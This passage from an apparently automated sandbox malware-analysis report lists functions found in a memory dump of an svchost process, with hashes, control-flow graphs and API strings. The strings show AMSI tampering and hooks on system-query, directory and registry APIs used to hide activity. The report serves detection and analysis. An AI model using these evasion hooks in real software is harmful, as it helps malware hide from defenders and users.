                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 8371F536B10A5086EB10DF65E88D69937B8FB8AF9DF081111DE4F67B28DF28C549C341
                                                        Function 000002A661301D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002A661301D47
                                                          • Part of subcall function 000002A6613020C0: GetModuleHandleA.KERNEL32(?,?,?,000002A661301D79), ref: 000002A6613020D8
                                                          • Part of subcall function 000002A6613020C0: GetProcAddress.KERNEL32(?,?,?,000002A661301D79), ref: 000002A6613020E9
                                                          • Part of subcall function 000002A661305F50: GetCurrentThreadId.KERNEL32 ref: 000002A661305F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: b3fabe37c4680668d1ae011a90c989e86a7bf41738fed13202891c8a3ce4ee20
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: E44187A5B10A8AA2FA05DB65ED5E7D4336EA706F46F8C4023940B27575DF3C828DC393
                                                        Function 000002A6613012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: f5c37a36ef25a3a88bd1a4a094d32cd22919e670b9c6443afd41ee3b8fcd4d68
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: EB512832B10B8487EB14DF62E44D35AB7B5F78AF99F084124DA4A27768DF3CC0498741
                                                        Function 000002A6612D6D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 66319a59e465040172f2708f6662c54a8d1af914a7905c09fce3c1ffde232696
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 8E81AC61F006C18BFA64AB76E88D399269DAF87F84F4C4115EA4943796DF3CC9CD8302
                                                        Function 000002A661302FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: d600d0342521e5dc14df8aff5c13f6e4325c40e3bdc537f4051cfcbd9786d19f
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 2D318222F00A419BE711DF22A80C75AB3A8FB89F96F484525DE4B63724DF3CC45E8781
                                                        Function 000002A6613030B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: fe809002958c5b70657823c4d9fc4eb754dddcf7c3a06f73e309caee62860b1d
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: F5316D21B10B418BE754EF66A84CB5A73F9FB8AF96F084125DE4B63724DF3CC40A8641
                                                        Function 000002A661302C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 189 2a661302c10-2a661302c8d 191 2a661302e8c-2a661302eaf 189->191 192 2a661302c93-2a661302c99 189->192 192->191 193 2a661302c9f-2a661302ca2 192->193 193->191 194 2a661302ca8-2a661302cab 193->194 194->191 195 2a661302cb1-2a661302cc1 GetModuleHandleA 194->195 196 2a661302cc3-2a661302cd3 GetProcAddress 195->196 197 2a661302cd5 195->197 198 2a661302cd8-2a661302cf6 196->198 197->198 198->191 200 2a661302cfc-2a661302d1b StrCmpNIW 198->200 200->191 201 2a661302d21-2a661302d25 200->201 201->191 202 2a661302d2b-2a661302d35 201->202 202->191 203 2a661302d3b-2a661302d3f 202->203 203->191 204 2a661302d45 203->204 205 2a661302d4c-2a661302d5f 204->205 206 2a661302d6f 205->206 207 2a661302d61-2a661302d6d 205->207 208 2a661302d72-2a661302d76 206->208 207->208 209 2a661302d86 208->209 210 2a661302d78-2a661302d84 208->210 211 2a661302d89-2a661302d93 209->211 210->211 212 2a661302d99-2a661302d9c 211->212 213 2a661302eb0-2a661302eb4 211->213 216 2a661302d9e-2a661302db2 call 2a661301934 212->216 217 2a661302db5-2a661302db8 212->217 214 2a661302eb6-2a661302eb9 213->214 215 2a661302e6e-2a661302e81 213->215 218 2a661302ebb-2a661302ece call 2a661301934 214->218 219 2a661302ed1-2a661302ed4 214->219 215->205 223 2a661302e87 215->223 216->217 221 2a661302dba-2a661302dc5 217->221 222 2a661302e1f-2a661302e22 217->222 218->219 228 2a661302ed6-2a661302ee1 219->228 229 2a661302f02-2a661302f05 219->229 230 2a661302dc7-2a661302dd4 221->230 231 2a661302dea-2a661302ded 221->231 224 2a661302e34-2a661302e41 lstrlenW 222->224 225 2a661302e24 222->225 223->191 234 2a661302e43-2a661302e4f call 2a661301bf4 224->234 235 2a661302e55-2a661302e61 call 2a661303c70 224->235 232 2a661302e27-2a661302e2e call 2a661301bbc 225->232 228->229 236 2a661302ee3-2a661302ef0 228->236 229->224 238 2a661302f0b-2a661302f0d 229->238 237 2a661302dd8-2a661302dde 230->237 231->222 239 2a661302def-2a661302dfa 231->239 232->224 244 2a661302f19-2a661302f24 232->244 234->235 254 2a661302f12 234->254 235->254 255 2a661302e67 235->255 242 2a661302ef4-2a661302efa 236->242 237->244 245 2a661302de4-2a661302de8 237->245 238->232 239->222 246 2a661302dfc-2a661302e09 239->246 242->244 249 2a661302efc-2a661302f00 242->249 251 2a661302f26-2a661302f2a 244->251 252 2a661302f92-2a661302f99 244->252 245->231 245->237 253 2a661302e0d-2a661302e13 246->253 249->229 249->242 256 2a661302f2c-2a661302f30 251->256 257 2a661302f32-2a661302f47 call 2a6613089d0 251->257 252->215 253->244 258 2a661302e19-2a661302e1d 253->258 254->244 255->215 256->257 259 2a661302f4c-2a661302f4f 256->259 257->259 258->222 258->253 261 2a661302f6f-2a661302f72 259->261 262 2a661302f51-2a661302f6a call 2a6613089d0 259->262 261->252 264 2a661302f74-2a661302f8d call 2a6613089d0 261->264 262->261 264->252
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: a387560ea905659ccb8272e6c85d93e934b63f6a9fc372877915c3c60fa115c0
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 00A18C32B00A8187EB588F25D60C69973E9F746F99F584026DE4E67B98DF38CC49C381
                                                        Function 000002A66130104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 266 2a66130104c-2a6613010b9 RegQueryInfoKeyW 267 2a6613011b7-2a6613011d2 266->267 268 2a6613010bf-2a6613010c9 266->268 268->267 269 2a6613010cf-2a66130111f RegEnumValueW 268->269 270 2a6613011a7-2a6613011b1 269->270 271 2a661301125-2a66130112a 269->271 270->267 270->269 271->270 272 2a66130112c-2a661301137 271->272 273 2a661301149-2a66130114e 272->273 274 2a661301139 272->274 276 2a66130119d-2a6613011a5 273->276 277 2a661301150-2a66130119b GetProcessHeap HeapAlloc GetProcessHeap HeapFree 273->277 275 2a66130113d-2a661301141 274->275 275->270 278 2a661301143-2a661301147 275->278 276->270 277->276 278->273 278->275
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: af04300308808e81b21d15fd87a1c889461f9cd28fcb8d9089a114049921a180
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 6B415C32714B8087E764CF62E44839A77B5F38AB99F488129DA8A17B58DF3CC549CB41
                                                        Function 000002A661302344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 900f71070070d9abe1b8849eb5d46759e6146ce4ce717753c2b0b13c55d548f7
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 7911F636A14B8083E710CB21F54D35A77A4F78AFA5F584215EA9B17AA8CF7CC14DCB42
                                                        Function 000002A661307930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 284 2a661307930-2a661307936 285 2a661307938-2a66130793b 284->285 286 2a661307971-2a66130797b 284->286 287 2a66130793d-2a661307940 285->287 288 2a661307965-2a6613079a4 call 2a661307fe0 285->288 289 2a661307a98-2a661307aad 286->289 290 2a661307958 __scrt_dllmain_crt_thread_attach 287->290 291 2a661307942-2a661307945 287->291 307 2a6613079aa-2a6613079bf call 2a661307e74 288->307 308 2a661307a72 288->308 292 2a661307abc-2a661307ad6 call 2a661307e74 289->292 293 2a661307aaf 289->293 299 2a66130795d-2a661307964 290->299 295 2a661307947-2a661307950 291->295 296 2a661307951-2a661307956 call 2a661307f24 291->296 305 2a661307ad8-2a661307b0d call 2a661307f9c call 2a661307e3c call 2a661308338 call 2a661308150 call 2a661308174 call 2a661307fcc 292->305 306 2a661307b0f-2a661307b40 call 2a6613081b0 292->306 297 2a661307ab1-2a661307abb 293->297 296->299 305->297 318 2a661307b51-2a661307b57 306->318 319 2a661307b42-2a661307b48 306->319 316 2a661307a8a-2a661307a97 call 2a6613081b0 307->316 317 2a6613079c5-2a6613079d6 call 2a661307ee4 307->317 312 2a661307a74-2a661307a89 308->312 316->289 334 2a661307a27-2a661307a31 call 2a661308150 317->334 335 2a6613079d8-2a6613079fc call 2a6613082fc call 2a661307e2c call 2a661307e58 call 2a661309dfc 317->335 324 2a661307b59-2a661307b63 318->324 325 2a661307b9e-2a661307bb4 call 2a661303618 318->325 319->318 323 2a661307b4a-2a661307b4c 319->323 330 2a661307c3f-2a661307c4c 323->330 331 2a661307b6f-2a661307b7d 324->331 332 2a661307b65-2a661307b6d 324->332 344 2a661307bb6-2a661307bb8 325->344 345 2a661307bec-2a661307bee 325->345 337 2a661307b83-2a661307b98 call 2a661307930 331->337 348 2a661307c35-2a661307c3d 331->348 332->337 334->308 356 2a661307a33-2a661307a3f call 2a6613081a0 334->356 335->334 384 2a6613079fe-2a661307a05 __scrt_dllmain_after_initialize_c 335->384 337->325 337->348 344->345 353 2a661307bba-2a661307bdc call 2a661303618 call 2a661307a98 344->353 346 2a661307bf0-2a661307bf3 345->346 347 2a661307bf5-2a661307c0a call 2a661307930 345->347 346->347 346->348 347->348 365 2a661307c0c-2a661307c16 347->365 348->330 353->345 379 2a661307bde-2a661307be3 353->379 373 2a661307a41-2a661307a4b call 2a6613080b8 356->373 374 2a661307a65-2a661307a70 356->374 370 2a661307c18-2a661307c1f 365->370 371 2a661307c21-2a661307c31 365->371 370->348 371->348 373->374 383 2a661307a4d-2a661307a5b 373->383 374->312 379->345 383->374 384->334 385 2a661307a07-2a661307a24 call 2a661309d98 384->385 385->334
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 2cfcdc948a9de1d10b6df2867afef34899f3b6667a05ece3429fded038ae8830
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 0E810221F0064187FA50EB65984E39922DCAB87F82F0C4425DA8B77796DF3CC94E8383
                                                        Function 000002A661309930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 2a661309930-2a66130996e 389 2a661309a5f 388->389 390 2a661309974-2a661309977 388->390 391 2a661309a61-2a661309a7d 389->391 390->391 392 2a66130997d 390->392 393 2a661309980 392->393 394 2a661309986-2a661309995 393->394 395 2a661309a57 393->395 396 2a661309997-2a66130999a 394->396 397 2a6613099a2-2a6613099c1 LoadLibraryExW 394->397 395->389 398 2a661309a39-2a661309a48 GetProcAddress 396->398 399 2a6613099a0 396->399 400 2a661309a19-2a661309a2e 397->400 401 2a6613099c3-2a6613099cc GetLastError 397->401 398->395 406 2a661309a4a-2a661309a55 398->406 402 2a661309a0d-2a661309a14 399->402 400->398 405 2a661309a30-2a661309a33 FreeLibrary 400->405 403 2a6613099fb-2a661309a05 401->403 404 2a6613099ce-2a6613099e3 call 2a66130ae48 401->404 402->393 403->402 404->403 409 2a6613099e5-2a6613099f9 LoadLibraryExW 404->409 405->398 406->391 409->400 409->403
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099B5
                                                        • GetLastError.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A661309A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A661309A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: f0791b96ef91c1d198ed1d9129c3e51a47dbba9e60560fbbe84c9b6c10888074
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 02319021B1264092FE15DF06A80C79962DCB74AFA5F5D4525DD2F67390DF3CC4898382
                                                        Function 000002A661311CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 4d15754415cb6b26f3af690b2db3d5ac8b0ed21cde72321f032982f121a3ca1e
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: DA114931B14A4087E7509B52A84E31976A9B79AFE4F484225EA5F977A4CF7CC8088741
                                                        Function 000002A661305F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: d3911cc119219c1cc973d9d01e034cee812cdfb5a5aa00d1aae4b005dd0a6e37
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: DAD1AB76608B8882EA70DB0AE49935A77E4F3C9F85F140116EACE57BA9CF3CC545CB41
                                                        Function 000002A6613031C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
